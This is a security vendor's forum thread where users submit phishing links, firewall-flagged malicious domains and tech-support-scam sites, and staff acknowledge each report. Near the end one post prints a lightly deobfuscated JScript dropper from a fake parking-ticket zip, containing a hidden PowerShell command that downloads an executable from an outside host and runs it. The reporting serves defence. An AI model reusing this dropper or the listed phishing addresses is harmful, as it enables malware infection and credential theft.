Aura

Aura Malware Submissions

638 posts in this topic

RBC Royal Bank Phishing.

http://grm-opt.by/Qc5LCmP5z/index.php

 

0

Share this post


Link to post
Share on other sites

Thank you for your submission. A database update has already been issued and will be available via online update within the next minutes.

0

Share this post


Link to post
Share on other sites

Flagged by our Palo Alto Networks Firewall.

freemaintenancesafesystem4unow.website
freemaintenancesafesystem4unow.download
freemaintenancesafesystem4unow.space
gogrdm.abledaddepend.top
liveupdate45678safesystems.top
7safesystems4you.website -> Domain name incomplete
a3fc.clearsecureredir.com
elfagrtours-eg.com
24safesystems4younow.bid -> Domain name incomplete
e247safesystems4you.site -> Domain name incomplete

You can see that there's a pattern with the "system4you", "system4u", "system4unow", etc. websites.

0

Share this post


Link to post
Share on other sites

Thank you for your submission. I will look into it as soon as possible.

0

Share this post


Link to post
Share on other sites

E-mail impersonating Paypal leads to a Microsoft account phishing website.

http://appointmentwindow.space-to-rent.com/
http://loginorder44301029.ddnsking.com/weblogin/CA/OutAuth.php?wsignin=1&locale=en-us&loginlive=92995339817254973&SrcID=92995339817254973
0

Share this post


Link to post
Share on other sites

Flagged by our Palo Alto Networks Firewall.

setupforfree.ddns.net
pthdr.com
0

Share this post


Link to post
Share on other sites

Thank you for your submission. I will look into it as soon as possible.

0

Share this post


Link to post
Share on other sites

Flagged by our Palo Alto Networks Firewall.

tabila.biz
aff.mobi
fixmediadb.com
bma-autohaus.com
abledaddepend.top
0

Share this post


Link to post
Share on other sites

Thank you for your submission. I will look into it as soon as possible.

0

Share this post


Link to post
Share on other sites

Flagged by our Palo Alto Networks Firewall.

upgradesafesystem4unow.pw
acacionesmachupicchu.com -> Incomplete domain name (192.5.6.30 a.gtld-servers.net)
yourlovelive.com
srv1.delo-teh.ru
0

Share this post


Link to post
Share on other sites

Thank you for your submission. I will look into it as soon as possible.

0

Share this post


Link to post
Share on other sites

Flagged by our Palo Alto Networks Firewall.

Implant-dentaire-en-hongrie.fr
southernbdltd.com
0

Share this post


Link to post
Share on other sites

Thank you for your submission. I will look into it as soon as possible.

0

Share this post


Link to post
Share on other sites

Flagged by our Palo Alto Networks Firewall.

plecertifiedtraining.com -> Incomplete domain name (192.41.162.30)
www.thefantasydoctots.com
j1ti2.5387882.com
mwiouli.bud-crate-ago.ru -> Incomplete domain name (107.20.195.169)
0

Share this post


Link to post
Share on other sites

Thank you for your submission. I will look into it as soon as possible.

0

Share this post


Link to post
Share on other sites

Flagged by our Palo Alto Networks Firewall.

kurazi.top
www.arfd.info
fas.tekun.gov.my
0

Share this post


Link to post
Share on other sites

Thank you for your submission. I will look into it as soon as possible.

0

Share this post


Link to post
Share on other sites

Was spammed on BC.

http://www.windows10-technical-support.com/
http://www.quickbookscontactsupport.com/
1-888-352-9606
0

Share this post


Link to post
Share on other sites

Thank you for your submission. I will look into it as soon as possible.

0

Share this post


Link to post
Share on other sites

Spammed on GTG.

http://www.windows-supports.co.uk/windows-customer-service.php
http://www.microsoft-help.co.uk/
http://www.ukinfotechltd.com/
0

Share this post


Link to post
Share on other sites

Thank you for your submission. I will look into it as soon as possible.

0

Share this post


Link to post
Share on other sites

Spammed on BC.

http://computer-security.co.uk/
http://pc-antivirus.co.uk
http://virus-protections.co.uk/
http://email-customer-service.co.uk/
0

Share this post


Link to post
Share on other sites

Thank you for your submission. I will look into it as soon as possible.

0

Share this post


Link to post
Share on other sites

Flagged by our Palo Alto Networks Firewall.

repository.certum.pl
vmsrcysblnvlak.in -> Might be incomplete
www.arfd.info
hitechprint.co.uk
uykdxtsjgorq.website
0

Share this post


Link to post
Share on other sites

Thank you for your submission. I will look into it as soon as possible.

0

Share this post


Link to post
Share on other sites

Flagged by our Palo Alto Networks Firewall.

cdn7.91free.com
teklectic.com
dnspod-free.mydnspod.net (184.105.206.63)
repulsion.unsexed.ru (205.251.192.223)
ecoloinfo.com
nwp.trooper-policeman.ru (54.77.72.254)
www.mobiletrak.co
laparotomy.su
0

Share this post


Link to post
Share on other sites

Thank you for your submission. I will look into it as soon as possible.

0

Share this post


Link to post
Share on other sites

Flagged by our Palo Alto Networks Firewall.

5678safesystems.download -> Incomplete domain name (might be 12345678safesystems.download)
gateway.personali.com
garageartcafe.com
0

Share this post


Link to post
Share on other sites

Thank you for your submission. I will look into it as soon as possible.

0

Share this post


Link to post
Share on other sites

Flagged by our Palo Alto Networks Firewall.

vizagchildrensclub.org
grcroadshow.com
bak.adninjia.com
royano151201552.ddns.net -> Incomplete domain name
0

Share this post


Link to post
Share on other sites

Thank you for your submission. I will look into it as soon as possible.

0

Share this post


Link to post
Share on other sites

Flagged by our Palo Alto Networks Firewall.

betterforlesshome.com
cuntwa.com
0

Share this post


Link to post
Share on other sites

Thank you for your submission. I will look into it as soon as possible.

0

Share this post


Link to post
Share on other sites

Flagged by our Palo Alto Networks Firewall.

dashl.ca
pzqm.3322.org
0

Share this post


Link to post
Share on other sites

Thank you for your submission. I will look into it as soon as possible.

0

Share this post


Link to post
Share on other sites

Flagged by our Palo Alto Networks Firewall.

anyupdate.net
giezdertyp.swallowash.ru
vemnm.earlybriefcase.gdn
urbangardensgeraldton.net.au
ew.health-carereform.com
u.nya.is
www.driverupdate.net
romyandjacob.com
0

Share this post


Link to post
Share on other sites
https://docs.google.com/uc?export=download&id=0B0gQujlN-1V5aG85TWtmemZ6R00 

Leads to Canada - Parking Ticket (4).zip, which contains Canada - Parking Ticket (4).js. Slightly deobfuscated for comprehension purposes.

var lLpPuIOx = new ActiveXObject("Shell.appliCaTIoN");
var IUeGjl = new ActiveXObject("WSCRipt.sheLl");
var xLVaNQC = ""+
"HKQLM\\sQoQ"+
"tQwQaQRe\\mQIQCrosQOQt\\wQiQNQdQ"+
"OQws\\curQreNTQvEQRsQiQOn\\p"+
"QrQogrQaQMQilQEQsQDQir";
xLVaNQC = xLVaNQC.replace(/\Q/g, "");
var xVPpWShL = 'lLpPuIOx.ShellExecute("cmd.ExE", "/c ping localhost & powershell.exe -executionpolicy bypass -noproile -windowstyle hidden (new-object system.net.webclient).downloadile(\'http://hips2thighs.com/1nytaixucoxynidzoizip.exe?xerYK\',\'%appdAta%uOE78.exE\'); stARt-process \'%appdata%uOE78.exe\'", "", "open", 0);';
var HTZnQc = IUeGjl.RegRead(xLVaNQC).charAt(845251132/76841012);
eval(xVPpWShL.replace(RegExp(HTZnQc, "g"), ""));

Downloads 1nytaixucoxynidzoizip.exe from:

http://hips2thighs.com/1nytaixucoxynidzoizip.exe

https://www.virustotal.com/pt/file/63c18e94b61dfc0fbbaf223c36638e42c4bcc8631e99d04c90f93eaea6a261c8/analysis/1488209624/

1nytaixucoxynidzoizip.zip

0

Share this post


Link to post
Share on other sites

Thank you for your submission. I will look into it as soon as possible.

0

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now

  • Recently Browsing   0 members

    No registered users viewing this page.